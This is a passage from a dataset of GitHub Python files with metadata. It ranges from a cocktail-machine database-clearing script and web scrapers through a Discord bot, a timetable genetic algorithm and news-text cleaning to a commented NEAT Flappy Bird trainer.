local_db.create_backup()\n local_db.delete_database_data()\n _logger.log_event(\"INFO\", \"Data in local database was deleted by command.\")\n typer.echo(\n typer.style(\n \"Local database is clean, time to enter new recipes\",\n fg=typer.colors.GREEN, bold=True\n ))\n","repo_name":"AndreWohnsland/CocktailBerry","sub_path":"src/programs/clearing.py","file_name":"clearing.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"18"} +{"seq_id":"16875726030","text":"\n\nif __name__ == '__main__':\n # Num = [1]\n # Den = [1, 3, -20]\n system2 = MySystem([1], [-1, 1], TF_Feed=0.6)\n # instance= MySystem(Num, Den, TF_Feed = 1)\n # print(instance.is_stable_by_poles_method())\n # # instance.plot_impuls_response()\n # # instance.plot_step_response()\n # # instance.plot_bode_diagramme()\n # # instance.is_stable_by_poles_method(\n # # instance.plot_nyquist_diagramme() \n # instance.plot_step_response()\n # S = step_info(instance.TF)\n # for k in S:\n # print(f\"{k}: {S[k]}\")\n\n # # nichols(TransferFunction(Num, Den))\n # # # print(tf2ss(instance.TF))\n # # plt.show()\n sys = StateSpace([[-1., -1.],\n [1., 0.]],\n [[-1./np.sqrt(2.), 1./np.sqrt(2.)],\n [0, 0]],\n [[np.sqrt(2.), -np.sqrt(2.)]],\n [[0, 0]])\n # # t,y = step_response(system2)\n # # plt.plot(t, y[0][1])\n # plt.xlabel('Time [s]')\n # plt.ylabel('Amplitude')\n # plt.title('Step response')\n # plt.grid()\n # plt.show()\n\n system2.plot_step_response()","repo_name":"RedhaZid35/Control_Systems_Analyzer","sub_path":"__1/OLD/TrFunc.py","file_name":"TrFunc.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18178498483","text":"from database.Database import Database\nfrom instagram_util.InstaUtil import InstaUtil\n\n\ndbAPI = Database()\n\nfor project in dbAPI.get_projects():\n account = None\n try:\n account = dbAPI.get_next_insta_user_to_unfollow(project.project_id)\n insta_util = InstaUtil(project.insta_config)\n insta_util.unfollow(account.user_id)\n except Exception as e:\n print(e)\n finally:\n if account is not None:\n dbAPI.record_insta_unfollow(account)","repo_name":"pabloi09/reddit_reposter","sub_path":"reposter/batch_processes/insta_unfollower.py","file_name":"insta_unfollower.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6784150855","text":"\"\"\"Scrapes a WC3 game history page from battlenet and returns json.\"\"\"\nfrom helpers import wash_player_name\nfrom config import data_positions_history\nfrom urllib.parse import parse_qs\nimport pandas as pd\nimport json\nfrom bnet_page import BnetPage\nfrom profile_page import ProfilePage\n\n\nclass HistoryPage(BnetPage):\n def __init__(self, player, server, page=1):\n url = 'http://classic.battle.net/war3/ladder/w3xp-player-logged-games.aspx'\n params = {'PlayerName': player, 'PageNo': page, 'Gateway': server}\n super().__init__(server, url, params)\n self.player = player\n self.page = page\n\n @property\n def game_containers(self):\n return self.soup.find('table', id='tblGames').find_all('tr', class_='rankingRow')\n\n @property\n def games(self):\n for game in self.game_containers:\n yield Game(self.player, game).parse()\n\n @property\n def next_page(self):\n url = self.soup.find(text='Next\\xa0Page').parent.get('href')\n if url is not None:\n next_page = parse_qs(url).get('PageNo')[0]\n return int(next_page)\n\n\nclass Game:\n def __init__(self, player, soup):\n self.player = player\n self.soup = soup\n\n def parse(self):\n values = self.soup.find_all(['td'])\n values = [x.get_text().strip() for x in values]\n data = self.parse_values(values)\n game_id = self.soup.find_all(['td'])[0].a.get('href').split('&GameID=')[1]\n data['game_id'] = int(game_id)\n data['team_one'].append(self.player)\n\n for players in ['team_one', 'team_two']:\n data[players] = [wash_player_name(player) for player in data[players]]\n\n if data['winner'] == 'Win':\n data['winner'] = data['team_one']\n elif data['winner'] == 'Tie':\n data['winner'] = None\n else:\n data['winner'] = data['team_two']\n\n return data\n\n @staticmethod\n def parse_values(values):\n data = {}\n for field, meta_data in data_positions_history.items():\n i = meta_data['position']\n v = values[i]\n formatter = meta_data['function']\n if formatter:\n value = formatter(v)\n data[field] = value\n\n return data\n\n\nif __name__ == '__main__':\n print('-- Testing --')\n players = [\n {\n 'player': 'Fithydenk',\n 'server': 'azeroth'\n }\n # {\n # 'player': 'romantichuman',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'followgrubby',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'nightend',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'tanymommy',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'ilovenecropolis',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'alanford',\n # 'server': 'northrend'\n # },\n # {\n # 'player': '123456789012345',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'ZveroBoy',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'Feanor',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'SyDe',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'Nicker59',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'rg-back2game',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'ukto',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'pieck',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'IamTry',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'MisterWinner',\n # 'server': 'northrend'\n # },\n # {\n # 'player': 'Pieck',\n # 'server': 'azeroth'\n # },\n # {\n # 'player': 'Cocaine.',\n # 'server': 'azeroth'\n # },\n # {\n # 'player': 'ALANFORD',\n # 'server': 'Northrend'\n # },\n ]\n\n for player in players:\n page = 1\n games_all = []\n\n profile = ProfilePage(**player)\n print(\"\\n{}\".format(profile))\n while True:\n\n history_page = HistoryPage(player.get('player'), player.get('server'), page)\n games = list(history_page.games)\n games_all.extend(games)\n next_page = history_page.next_page\n if (next_page > 10) or (page >= next_page):\n break\n page = next_page\n\n df = pd.DataFrame(games_all)\n print(\"Number of games found: {}\".format(len(df)))\n print(\"Most recent game: {}\".format(df.loc[0, \"date\"]))\n\n data = df.to_dict(orient='records')\n for d in data:\n print(d)\n file_path = './data_backfill/partial/{}/{}.json'.format(\n player.get('server'), player.get('player'))\n\n with open(file_path, 'w') as f:\n json.dump(data, f)\n","repo_name":"chrisdaly/wc3_bnet_scraping","sub_path":"wc3_profile_scraper/wc3_profile_scraper/history_page.py","file_name":"history_page.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10164170730","text":"import discord\nfrom discord.ext import commands\nimport random\n\ndescription = '''An example bot to showcase the discord.ext.commands extension\nmodule.\n\nThere are a number of utility commands being showcased here.'''\n\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='?',\n description=description,\n intents=intents)\n\nrules_message = '''\nWelcome to the server🎉 Please read the rules below:\n\n• You have to register on the gravitas'23 website. No external registrations will be accepted.\n• Make sure to \"Check-In\" to the Hybrid Cryptic Hunt through the official website. You will also have to check-in for everyone you have paid for.\n• You will not be able to use the app without checking in.\n• You will require a working internet connection throughout the hunt.\n• For some of the questions, you will also need access to a laptop.\n• To make a team on the app, one person must select the \"Create a Team\" button and share the code given with the rest of the group.\n'''\n\nq_format = '''\nFORMAT OF THE QUESTIONS:\n\nThere are two types of questions:\n• Text Based🖹 - You have to enter the text to solve the question.\n• QR Based🖼️- You must go to the location and solve the QR code that is hidden there\n'''\nq_points = '''\nPOINTS PER QUESTION\n1. Easy - 100 points\n2. Medium - 250 points\n3. Hard - 500 points\n\nHints💡 will also be available. The cost of using a hint is: \n50% of the points for an easy question😮\n20% of the points for a medium or hard question🤔\n'''\n\n\n@bot.event\nasync def on_ready():\n print(f'Logged in as {bot.user} (ID: {bot.user.id})')\n print('------')\n\n\n@bot.command()\nasync def rules(ctx):\n await ctx.send(rules_message)\n\n\n@bot.command()\nasync def type(ctx):\n await ctx.send(q_format)\n\n\n@bot.command()\nasync def points(ctx):\n await ctx.send(q_points)\n\n\n@bot.command()\nasync def add(ctx, left: int, right: int):\n \"\"\"Adds two numbers together.\"\"\"\n await ctx.send(left + right)\n\n\n@bot.group()\nasync def cool(ctx):\n \"\"\"Says if a user is cool.\n\n In reality this just checks if a subcommand is being invoked.\n \"\"\"\n if ctx.invoked_subcommand is None:\n await ctx.send(f'No, {ctx.subcommand_passed} is not cool')\n\n\n@cool.command(name='bot')\nasync def _bot(ctx):\n \"\"\"Is the bot cool?\"\"\"\n await ctx.send('Yes, the bot is cool.')\n\n\nbot.run(\n '')\n","repo_name":"adarshxs/discord-bot-acm","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22914343015","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n lth = len(nums)\n\n if lth <= 2:\n return max(nums)\n\n dp = [0] * lth\n\n dp[0] = nums[0]\n dp[1] = max(nums[0], nums[1])\n\n for i in range(2, lth):\n dp[i] = max(dp[i - 2] + nums[i], dp[i - 1])\n\n return dp[-1]\n","repo_name":"sigmarion1/daily-algo","sub_path":"leetcode-top-interview-150/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28011007929","text":"from university import *\nfrom data import *\nimport random as rnd\n\nclass Evaluation:\n def __init__(self):\n self._data = Data()\n self._classes = []\n self._problems = 0\n self._healthRate = -1\n self._classNumb = 0\n self._ishealthRateChanged = True\n\n def get_classes(self):\n self._ishealthRateChanged = True\n return self._classes\n\n def get_healthRate(self):\n if (self._ishealthRateChanged == True):\n self._healthRate = self.calculate_healthRate()\n self._ishealthRateChanged = False\n return self._healthRate\n\n\n def initialize(self):\n specs = self._data._specs\n for i in range(0, len(specs)):\n subjects = specs[i]._subjects\n for j in range(0, len(subjects)):\n newClass = Class(self._classNumb, specs[i], subjects[j])\n self._classNumb = self._classNumb + 1\n newClass._lessonTime = Data()._meetingTimes[rnd.randrange(0, len(Data()._meetingTimes))]\n newClass._audience = Data()._rooms[rnd.randrange(0, len(Data()._rooms))]\n newClass._teacher = subjects[j]._teachers[rnd.randrange(0, len(subjects[j]._teachers))]\n self._classes.append(newClass)\n return self\n\n\n def calculate_healthRate(self):\n self._problems = 0\n classes = self.get_classes()\n for i in range(0, len(classes)):\n if (classes[i]._audience._places < classes[i]._subject._studentsMax):\n self._problems += 1\n for j in range(0, len(classes)):\n if (j > i):\n if (classes[i]._lessonTime == classes[j]._lessonTime):\n if (classes[i]._audience == classes[j]._audience): self._problems += 1\n if (classes[i]._teacher == classes[j]._teacher): self._problems += 1\n return 1 / ((1.0*self._problems + 1))\n\n\n def __str__(self):\n returnValue = \"\"\n for i in range(0, len(self._classes)-1):\n returnValue += str(self._classes[i]) + \", \"\n returnValue += str(self._classes[len(self._classes)-1])\n return returnValue\n","repo_name":"vrshchk/timetableGA","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35070549858","text":"import Request\nimport bs\nfrom pip._vendor import requests\nimport time\ndef askallurl():\n url = 'https://movie.douban.com/j/chart/top_list?'\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Core/1.94.175.400 QQBrowser/11.1.5155.400\"}\n params = {\n 'type': '13',\n 'interval_id': '100:90',\n 'action': '',\n 'start': '0',\n 'limit': '500'\n }\n try:\n response = requests.get(url,params = params,headers = headers)\n except:\n print(response)\n return \"\"\n return response.json()\ndef main():\n start = time.time()\n datalist = []\n movielist = askallurl()\n for movie in movielist:\n #输出爬取子站网址\n print(movie['url'])\n html = Request.request(movie['url'])\n # print('html'+html)\n data = bs.beautifulSoup(html)\n if(data != ''):\n datalist.append(data)\n end = time.time()\n print(\"爬虫耗时:{} s\".format(end - start))\n #print(datalist)\n return datalist\nif __name__ == '__main__':\n main()","repo_name":"zjczdzs/pythonCarlwer","sub_path":"main/GetALLSpider.py","file_name":"GetALLSpider.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7615159004","text":"import os, nltk, re\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.lancaster import LancasterStemmer\nfrom nltk.stem import WordNetLemmatizer\nimport timeit\nfrom Helpers.Logging import Critical, Info, Debug\nimport string\nfrom Stock_News_Analysis.Clean_Data.Possible_Stock_Names import get_all_stocks_possible_names\n\nPorter_Stemmer = PorterStemmer()\nLancaster_Stemmer = LancasterStemmer()\nWordNet_Lemmatizer = WordNetLemmatizer()\nRoot_Dir = \"C:/Users/nandpara/PycharmProjects/Machine_Learning1\"\nFiltered_News_File_Dir = Root_Dir + '/Market/Nse_Modules/News_Files/'\nCleaned_News_File = os.path.join(os.path.dirname(__file__), 'Cleaned_News_File.txt')\nDebug(Filtered_News_File_Dir)\nFrom_Line = 0\nTo_Line = 999999\n\nclass Clean_News_Data():\n \"\"\"\n Below Steps are followed to clean data\n 1.Each word\n 2.lowercase - already stored in lower case\n 3.remove punctuations\n 4.filter stopwords\n 5.lemmatize - map to root word\n \"\"\"\n def __init__(self, Date):\n self.Date = Date\n Filtered_News_File = Filtered_News_File_Dir + Date + \"_filtered_news_file.txt\"\n self.News_File_Opened = open(Filtered_News_File, 'r+')\n News = self.Make_News_File_generator(self.News_File_Opened)\n Cleaned_News_list = self.Remove_Punctuations_and_If_Alpha(News)\n Filtered_News = self.Filter_Stop_words(Cleaned_News_list)\n Stem_Words_News_List = self.Get_Stem_Words(Filtered_News)\n Lemmatize_News_Words_List = self.Lemmatize_News_Words(Stem_Words_News_List)\n Cleaned_News = self.Remove_Stock_Names_From_News(Lemmatize_News_Words_List)\n self.Store_Cleaned_News(set(Lemmatize_News_Words_List))\n\n def Log_It(self, *args):\n for arg in args:\n Debug(arg)\n\n def Store_Cleaned_News(self, Lemmatize_News_Words_List):\n Cleaned_News_File = os.path.join(os.path.dirname(__file__), \"Cleaned_Files/\" + self.Date + \"_Cleaned_News.txt\")\n clean_news_file = open(Cleaned_News_File, 'w+')\n for clean_news in Lemmatize_News_Words_List:\n clean_news_file.write(clean_news +'\\n')\n clean_news_file.close()\n\n def Make_News_File_generator(self, New_File_Opened):\n \"\"\"\n Reads File and make a list of all lines with removing \"\\n\" in each line end\n :param File_Path:\n :return: generator of file list\n \"\"\"\n\n yield [line.strip() for line in New_File_Opened.readlines()]\n\n\n def Remove_Punctuations_and_If_Alpha(self, News):\n \"\"\"\n splits each news line into words\n removes punctuations\n :param News:\n :return:\n \"\"\"\n Cleaned_News_list = []\n for each_line in News.next()[From_Line:To_Line]:\n\n list_of_alpha_words = [word for word in word_tokenize(each_line)\n if word not in string.punctuation]\n Cleaned_News = \" \".join([word.strip(\"'\") for word in list_of_alpha_words])\n Cleaned_News_list.append(Cleaned_News)\n self.Log_It(\"Remove_Punctuations_and_If_Alpha\",\n each_line, list_of_alpha_words, Cleaned_News)\n return Cleaned_News_list\n\n def Filter_Stop_words(self, Cleaned_News_list):\n \"\"\"\n Filters the stop words using nltk stopwords\n removes numbers as well\n :param Cleaned_News_list:\n :return:\n \"\"\"\n Filtered_News_List = []\n for each_news in Cleaned_News_list:\n each_news = re.sub('-', \" \", each_news)\n each_word_list = [word for word in word_tokenize(each_news)\n if len(word) > 1 ]\n removed_stop_words = [word for word in each_word_list\n if word not in stopwords.words('english')\n if word.isalpha()]\n Filtered_News = \" \".join(removed_stop_words)\n Filtered_News_List.append(Filtered_News)\n self.Log_It(\"Filter_Stop_words\", each_news, each_word_list, Filtered_News)\n return Filtered_News_List\n\n def Get_Stem_Words(self, Filtered_News_List):\n Stem_Words_News_List = []\n for each_news in Filtered_News_List:\n tmp_news = each_news\n news_words = word_tokenize(each_news)\n self.Log_It(\"Get_Stem_Words\", each_news, news_words)\n for each_word in news_words:\n stem_word = Porter_Stemmer.stem(each_word)\n tmp_news = re.sub(each_word, stem_word, tmp_news)\n Stem_Words_News_List.append(tmp_news)\n self.Log_It(tmp_news)\n\n return Stem_Words_News_List\n\n def Lemmatize_News_Words(self, Stem_Words_News_List):\n Lemmatize_News_Words_List = []\n for each_news in Stem_Words_News_List:\n tmp_news = each_news\n news_words = word_tokenize(each_news)\n self.Log_It(\"Lemmatize_News_Words\",each_news, news_words)\n for each_word in news_words:\n lemma_word = WordNet_Lemmatizer.lemmatize(each_word)\n tmp_news = re.sub(each_word, lemma_word, tmp_news)\n Lemmatize_News_Words_List.append(tmp_news)\n self.Log_It(tmp_news)\n return Lemmatize_News_Words_List\n\n def Remove_Stock_Names_From_News(self, Lemmatize_News_Words_List):\n all_stocks_possible_names = get_all_stocks_possible_names()\n Cleaned_News = []\n for each_news in Lemmatize_News_Words_List:\n tmp_news = each_news\n news_words = word_tokenize(each_news)\n for each_word in news_words:\n if each_word in all_stocks_possible_names:\n each_news = re.sub(r'\\\\b{}\\\\b'.format(each_news), '', each_news)\n self.Log_It(tmp_news, each_news)\n\n\n\n\n\n\n def __del__(self):\n self.News_File_Opened.close()\n\n# Clean_News_Data(Date='20181023')\n\n","repo_name":"NandaCj/Machine_Learning1","sub_path":"Stock_News_Analysis/Clean_Data/Clean_Filtered_News.py","file_name":"Clean_Filtered_News.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23446903930","text":"'''\nGuide for config file -\nYou can refer to: https://neat-python.readthedocs.io/en/latest/config_file.html\n\nBut you can use this project's config file as a template if you want to start as soon as possible\n1. Copy and paste this project's config file to your config file\n2. And change the details according to your project's requirements in ONLY THE FIRST 3 BLOCKS\n\nThe first 3 blocks are marked in the config file in case you fail to find it.\nAnd fitness_threshold is the maximum/optimum fitness that you want\n'''\n\n# importing all modules\nimport pygame as pg # simulation module\nimport neat # main NEAT module (pip install neat-python)\nfrom collections import deque # deque is just a list with maximum size and removes old items automatically\nfrom random import randint # just to set the pipe's y position\n\n# starting pygame and font to display score, generation etc.\npg.init()\npg.font.init()\n\n# mainly as a treat to the eyes (draws a line from the bird to the pipe)\ndraw_lines = True\n\n# defining the screen and its height and width\nscreen_width, screen_height = 400, 600\nscreen = pg.display.set_mode((screen_width, screen_height))\n\n# the background image (found no other place to initialise it!)\nbg_image = pg.transform.scale(pg.image.load(\"Images/background.gif\"), (screen_width, screen_height - 100))\n\n# defining the font and some colors\nfont = pg.font.Font('freesansbold.ttf', 32)\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\n\n# defining the fps or the speed of the game (can be increased or decreased using up and down arrow keys)\nfps = 20\nfps_clock = pg.time.Clock()\n\n# the bird class\nclass Bird:\n def __init__(self):\n # starting x and y position of the bird\n self.x = screen_width // 4\n self.y = screen_height // 2\n\n # loading the image of the bird and defining a rect for collision detection\n self.image = pg.transform.scale(pg.image.load(\"Images/bird.gif\"), (screen_height // 12, screen_height // 12))\n self.rect = None\n\n # how much to change y position of the bird when jumping and falling\n self.jump_power = 50\n self.fall_power = 15\n\n def display(self):\n # displaying the bird and making it fall\n self.fall()\n self.rect = screen.blit(self.image, (self.x, self.y))\n\n def jump(self):\n # making the bird jump if it doesn't go out of the screen (upwards)\n if self.y > 0:\n self.y -= self.jump_power\n\n def fall(self):\n # making the bird fall\n self.y += self.fall_power\n\n# class for the pipe(s)\nclass Pipe:\n def __init__(self):\n # loading the top and bottom pipes' images\n self.image_top = pg.transform.scale(pg.image.load(\"Images/pipet.gif\"), (screen_width // 4, screen_height))\n self.image_bottom = pg.transform.scale(pg.image.load(\"Images/pipeb.gif\"), (screen_width // 4, screen_height))\n\n # the rect of both (for collision detection)\n self.top_rect = None\n self.bottom_rect = None\n\n # defining the gap between the top and bottom pipes, the x position and the random y position\n self.gap = 150\n self.x = screen_width\n self.y = randint(0, screen_height - 100 - self.gap)\n\n def display(self):\n # displaying the pipes\n self.top_rect = screen.blit(self.image_top, (self.x, self.y - self.image_top.get_height()))\n self.bottom_rect = screen.blit(self.image_bottom, (self.x, self.y + self.gap))\n\n def move(self):\n # moving the pipes to the left\n self.x -= 10\n\n def check_collision(self, bird_rect):\n # collision detection with the bird (notice the rect of the bird)\n return self.top_rect.colliderect(bird_rect) or self.bottom_rect.colliderect(bird_rect)\n\n def reached_bird(self):\n # just getting info if the pipe has reached the bird\n return self.x + self.image_top.get_width() == screen_width // 4\n\n# class for the ground (I did not intend to make a new whole new class for the ground but added it anyway)\nclass Ground:\n def __init__(self):\n # as usual the loading the images but not the rect (reason given later)\n self.image = pg.transform.scale(pg.image.load(\"Images/ground.gif\"), (screen_width, screen_height // 6))\n\n # the x and y position of the ground and it is just static\n self.x = 0\n self.y = screen_height - self.image.get_height()\n\n def display(self):\n # displaying the ground\n self.rect = screen.blit(self.image, (self.x, self.y))\n\n def collide_with_ground(self, bird_obj):\n # not using rect as it is an extensive process and collision can simply be checked by using y position\n # if bird's y is greater than ground's y then it has collided\n return bird_obj.y > self.y\n\n# the main controller or the environment\nclass GameEnv:\n def __init__(self):\n # the list for the birds\n self.birds = []\n\n # list for pipes and DEQUE ALERT!!!\n self.pipes = deque(maxlen=2) # notice the maxlen\n self.pipes.append(Pipe()) # adding the first pipe\n\n # initialising some extra details\n self.score = 0\n self.generation = 0 # seems akward but okay?!\n self.alive_birds = len(self.birds)\n\n # and finally the ground\n self.ground = Ground()\n\n def add_bird(self, genome, config):\n # adding bird based on the genome and config\n\n # genome is like the store of information (not sure, just intuition)\n genome.fitness = 0\n # net is the bird's brain\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n # The main body or the Bird object\n bird_body = Bird()\n\n # adding the full bird to the birds list\n self.birds.append(\n {\n \"bird_obj\": bird_body,\n \"net\": net,\n \"genome\": genome,\n }\n )\n\n def display_all(self):\n # nothing fancy just displaying everything-\n\n # 1. all birds\n for bird in self.birds:\n bird[\"bird_obj\"].display()\n\n # 2. all pipes\n for pipe in self.pipes:\n pipe.display()\n\n # 3. the ground\n self.ground.display()\n\n def check_removal_birds(self):\n # main site of checking collisions\n\n # define a list, add all collided birds to the list and remove them from the birds list at the end\n # because removing it on the go gives an error\n birds_to_remove = []\n\n # check for all birds\n for bird in self.birds:\n # finally, THE BIRD RECT\n bird_rect = bird[\"bird_obj\"].rect\n\n # and with pipes\n for pipe in self.pipes:\n\n # check collision with the ground\n if self.ground.collide_with_ground(bird[\"bird_obj\"]):\n birds_to_remove.append(bird)\n break\n\n if pipe.check_collision(bird_rect):\n birds_to_remove.append(bird)\n break\n\n # now just remove the collided birds from the main birds list\n for rem in birds_to_remove:\n rem[\"genome\"].fitness -= 1\n self.birds.remove(rem)\n\n # updating the number of the birds alive\n self.alive_birds = len(self.birds)\n\n def move_pipes(self):\n # just like the previous problem - gives an error if pipes are added on the go\n pipes_to_append = []\n\n # iterating over all pipes\n for pipe in self.pipes:\n # move the pipe\n pipe.move()\n\n # if the pipe reaches the birds then just update the score\n if pipe.reached_bird():\n self.score += 1\n pipes_to_append.append(Pipe()) # and add a new pipe, the old pipe that is beyond the screen is automatically deleted (because of deque)\n\n # Tip: to add list to another list use extend instead append\n self.pipes.extend(pipes_to_append) # just add the new pipes\n\n def get_info(self, bird):\n # this is just the pipe ahead of the bird\n pipe = self.pipes[-1]\n\n # if draw_lines is True then just show \"what the bird sees\"\n width = pipe.image_top.get_width()\n if draw_lines:\n pg.draw.line(screen, RED, (bird.x, bird.y), (pipe.x + width, pipe.y), 3)\n pg.draw.line(screen, GREEN, (bird.x, bird.y), (pipe.x + width, pipe.y + pipe.gap), 3)\n\n # and finally return the information\n return (\n bird.y, # bird's y position\n pipe.y, # top pipe's y position\n pipe.y + pipe.gap, # bottom pipe's y position\n pipe.x # and pipe's x position\n )\n\n def move_birds(self):\n # moving the birds according to their brains or the NEAT net\n for bird in self.birds:\n # For more distance keep adding the fitness (i.e. more distance -> more fitness)\n bird[\"genome\"].fitness += 1\n\n # just think according to the information given by the above method\n output = bird[\"net\"].activate(self.get_info(bird[\"bird_obj\"]))\n\n # if output is greater than 0.5 then jump\n # we are using sigmoid activation with val ranging from 0 to 1 so if probability is greater than 50% then jump\n if output[0] > 0.5:\n bird[\"bird_obj\"].jump()\n\n def all_dead(self):\n # just a helper method to know if all birds are dead\n return not len(self.birds) > 0\n\n def reset(self):\n # just the initial setting is called when reset is called\n self.birds = []\n self.score = 0\n\n self.pipes = deque(maxlen=2)\n self.pipes.append(Pipe())\n\n self.ground = Ground()\n\n # as this will only be called when one generation finishes, so increase the generation number\n self.generation += 1\n\n# defining the main game env\n##################\nenv = GameEnv() ##\n##################\n\n# THIS IS THE MAIN FUNCTION THAT WILL CALLED AFTER EACH GENERATION AND IS DIRECTLY USED BY THE neat-python MODULE\ndef eval_genomes(genomes, config):\n # just get the global fps to change it later\n global fps\n\n # Just to start the program when user hits enter (or anything)\n if env.generation == 0:\n input(\"Press enter to start: \")\n\n # this is something special to just add the members in the population\n # and this tends to give the population size given in the config file\n for genome_id, genome in genomes:\n env.add_bird(genome, config)\n\n # the main loop\n while True:\n # draw the background\n screen.blit(bg_image, (0, 0))\n\n # the environment functions\n env.move_pipes()\n env.move_birds()\n env.display_all()\n env.check_removal_birds()\n\n # if all birds are dead just reset the environment and break the loop, the neat-python module will handle it automatically\n if env.all_dead():\n env.reset()\n break\n\n # just displaying the extra information\n screen.blit(font.render(f\"Generation: {env.generation}\", True, WHITE), (10, screen_height - 100))\n screen.blit(font.render(f\"Score: {env.score}\", True, WHITE), (10, screen_height - 70))\n screen.blit(font.render(f\"Birds Alive: {env.alive_birds}\", True, WHITE), (10, screen_height - 40))\n\n # the event loop\n for event in pg.event.get():\n # if you click the close button, then close the window and stop the program\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n\n # this just to control the fps\n if event.type == pg.KEYDOWN:\n # up key to increase the fps\n if event.key == pg.K_UP:\n fps += 5\n # down key to decrease the fps\n elif event.key == pg.K_DOWN:\n fps -= 5\n\n # update the screen and respect the fps (just do everything according to the fps)\n pg.display.update()\n fps_clock.tick(fps)\n\ndef main():\n config_file = \"config.txt\" # just the main config file\n\n # this line seems to be omnipresent in almost all neat-python examples by Code-Reclaimers\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # initialise the main population\n p = neat.Population(config)\n\n # just adding some reporters to give the report and statistics of the generation\n # perfectly safe to comment out\n p.add_reporter(neat.StdOutReporter(True))\n p.add_reporter(neat.StatisticsReporter())\n\n # this just says -\n # hey population, here is the main eval_genomes functions and here is the number of generations I want you to run this for\n # But if any bird's fitness exceeds the fitness_threshold (in config file) then it will automatically stop the program (when the bird collides without running it for all generations)\n winner = p.run(eval_genomes, 5000)\n print(f\"Best genome:\\n {winner}\")\n\n# and this is just calling the main function\nif __name__ == '__main__':\n main()\n\n# stopping pygame\npg.quit()\n\n'''\nTHE END\nThank You\n'''\n","repo_name":"reddragonnm/FlappyBird-AI","sub_path":"v1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13189,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"37751718679","text":"import os\nimport re\nimport shutil\nfrom rich.progress import track\n\nclass DatasetManager:\n \"\"\"\n Utility class for managing datasets by organizing and moving files into train, test, and validation folders.\n\n Args:\n dataset_path (str): The path to the dataset directory.\n\n Attributes:\n dataset_path (str): The path to the dataset directory.\n train_path (str): The path to the train folder within the dataset.\n test_path (str): The path to the test folder within the dataset.\n val_path (str): The path to the validation folder within the dataset.\n class_labels (list): A list of class labels.\n\n Methods:\n create_folders():\n Creates the train, test, and validation folders if they don't exist.\n load_class_labels(classes_file: str):\n Loads the class labels from a file.\n create_class_subfolders():\n Creates subfolders within the train, test, and validation folders for each class label.\n move_files(filename: str):\n Moves the files from the source directory to their respective class subfolders.\n\n \"\"\"\n \n def __init__(self, dataset_path):\n self.dataset_path = dataset_path\n self.train_path = os.path.join(f'{dataset_path}/images', 'train')\n self.test_path = os.path.join(f'{dataset_path}/images', 'test')\n self.val_path = os.path.join(f'{dataset_path}/images', 'val')\n self.class_labels = []\n\n def create_folders(self):\n os.makedirs(self.train_path, exist_ok=True)\n os.makedirs(self.test_path, exist_ok=True)\n os.makedirs(self.val_path, exist_ok=True)\n\n def load_class_labels(self, classes_file):\n with open(classes_file, \"r\") as file:\n for line in file:\n label = line.strip().replace(\"\\t\", \"\").title()\n self.class_labels.append(label)\n\n def create_class_subfolders(self):\n for label in self.class_labels:\n train_class_folder = os.path.join(self.train_path, label)\n test_class_folder = os.path.join(self.test_path, label)\n val_class_folder = os.path.join(self.val_path, label)\n os.makedirs(train_class_folder, exist_ok=True)\n os.makedirs(test_class_folder, exist_ok=True)\n os.makedirs(val_class_folder, exist_ok=True)\n\n def move_files(self, filename):\n if filename == \"val.txt\":\n file_path = os.path.join(self.dataset_path, \"val.txt\")\n destination_path = self.val_path\n elif filename == \"train.txt\":\n file_path = os.path.join(self.dataset_path, \"train.txt\")\n destination_path = self.train_path\n elif filename == \"test.txt\":\n file_path = os.path.join(self.dataset_path, \"test.txt\")\n destination_path = self.test_path\n \n with open(file_path, \"r\") as file:\n for line in 